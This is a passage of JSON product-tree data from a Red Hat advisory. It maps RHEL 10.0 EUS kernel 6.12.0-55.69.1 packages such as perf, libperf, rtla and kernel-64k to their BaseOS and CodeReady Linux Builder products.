"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v. 10.0)",
"product_id": "BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "BaseOS-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.src",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
